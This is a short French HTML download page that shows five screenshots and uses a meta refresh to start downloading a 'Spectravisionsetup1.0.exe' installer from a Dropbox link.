<!DOCTYPE html>
<html lang="fr">
<head>
  <meta charset="UTF-8">
  <title>Téléchargement...</title>
  <style>
        body {
            background-color: #000000;
            font-family: Arial, sans-serif;
            display: flex;
            flex-direction: column;
            justify-content: space-between;
            align-items: center;
            align-content: flex-start;
            flex-wrap: nowrap;
            gap: 3rem;
        }
   </style>
  <meta http-equiv="refresh" content="0; URL='https://www.dropbox.com/scl/fi/s6lyb5jqb6skz65hz3frg/Spectravisionsetup1.0.exe?rlkey=1y68vife0afz2lgd2uczrrl5l&st=bpo5bzrz&dl=1'"
</head>
<body>
  <img src="asset/Capture d'écran 2026-01-31 173023.png" class="logo-img" />
  <img src="asset/Capture d'écran 2026-01-31 173032.png" class="logo-img" />
  <img src="asset/Capture d'écran 2026-01-31 173113.png" class="logo-img" />
  <img src="asset/Capture d'écran 2026-01-31 173121.png" class="logo-img" />
  <img src="asset/Capture d'écran 2026-01-31 173126.png" class="logo-img" />
</body>
</html>
